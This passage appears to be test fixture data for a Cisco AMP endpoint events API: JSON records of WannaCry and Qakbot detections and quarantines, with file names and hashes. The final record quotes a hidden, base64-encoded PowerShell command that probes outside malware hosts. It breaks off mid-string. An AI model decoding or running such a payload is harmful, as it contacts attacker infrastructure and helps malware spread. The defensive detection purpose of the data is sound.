Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAc